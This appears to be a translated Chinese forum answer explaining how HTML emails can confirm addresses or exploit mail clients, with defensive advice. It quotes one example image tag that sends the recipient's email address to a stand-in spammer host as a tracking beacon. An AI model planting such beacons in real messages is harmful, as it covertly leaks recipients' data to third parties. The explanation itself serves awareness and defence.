我会给你一个非常简单的例子。在客户端更新以应对这种情况之前，一个常见的垃圾邮件发送者技巧是在 HTML 电子邮件中嵌入 1px 方形 GIF。你会收到这样的消息：

<img src="http://nastyevilspammer.invalid/pic.gif?email=poorvictim@domain.com" />

不用说，这pic.gif实际上是一个带有 get 参数的 cgi 脚本。结果如下所示：

1. 客户打开电子邮件。
2. 客户端自动呈现 html，包括获取所有远程内容。
3. nastyevilspammer.invalid 要求提供该地址，包括 get 参数中的电子邮件。
4. 服务器触发一个程序，记录get参数，返回1px的GIF。

这个技巧被用来确认电子邮件地址是活跃的垃圾邮件目标，将它们移动到活跃的地址列表中，然后垃圾邮件发送者将其出售。

问题和解决方案在于第 2 步 -自动信任传入的内容。

仅需要阅读电子邮件的电子邮件客户端中的错误需要客户端阅读器中的错误，该错误可用于触发漏洞利用。例如，HTML 渲染引擎可能会加载 Flash 播放器。这不太可能，但客户端的字符串处理代码中可能存在漏洞。等等。

现在，这也适用于 Web 客户端——它们将向浏览器提供 html 以进行渲染，从而打开所有附加的浏览器漏洞。我不打算阅读这篇文章，但我现在有：

新一代的电子邮件恶意软件由 HTML 电子邮件组成，当打开电子邮件时会自动下载恶意软件。

这篇文章对细节有点轻描淡写，但我想花时间提供一些更冷静的建议：

• 这是每日邮报，我来自英国。他们确实有恐吓故事的倾向。
• 这绝不是“新一代”恶意软件。自石器时代以来，人们就一直在利用 HTML 电子邮件漏洞，或者至少在第一部 Matrix 电影之前就已经开始利用 HTML 电子邮件漏洞，并且路过式下载也已经持续了一段时间。
• 一个非常简单的对策是默认配置您的电子邮件客户端根本不呈现 html 内容。然后，您可以选择从受信任的来源加载 html 电子邮件。大多数体面的电子邮件阅读器都可以这样做并且默认情况下会这样做 - 包括 GMail 和 Thunderbird（我使用的两个客户端）。

• 通过执行通常的操作，您可以大大提高避免恶意软件的机会：打开 Windows 更新。安装防火墙/防病毒软件。注意您访问的网站。为您的浏览器添加以安全为中心的扩展（NotScripts、noscript等）。尽可能使用最新的浏览器和操作系统。等等。

  最后：

• 电子邮件可能看起来来自您的联系人/朋友，但您无法验证 - 请小心。您的银行/建筑协会不需要您通过互联网验证您的联系方式 - 如果他们确实有问题，他们可能会写信给您，如果您不确定，请前往您的分行。尼日利亚的一个富人并没有 给你留下一大笔遗产，那些蓝色药丸不起作用，其他任何看起来好得令人难以置信的事情都可能是。

在这种情况下，电子邮件必须利用您的电子邮件客户端中的错误。这对于纯文本电子邮件相对较难，但对于 html 电子邮件更容易。Html 解析器和渲染器很复杂，并且经常包含允许代码执行的错误（例如缓冲区溢出）。从安全角度来看，查看恶意电子邮件与查看恶意网站非常相似。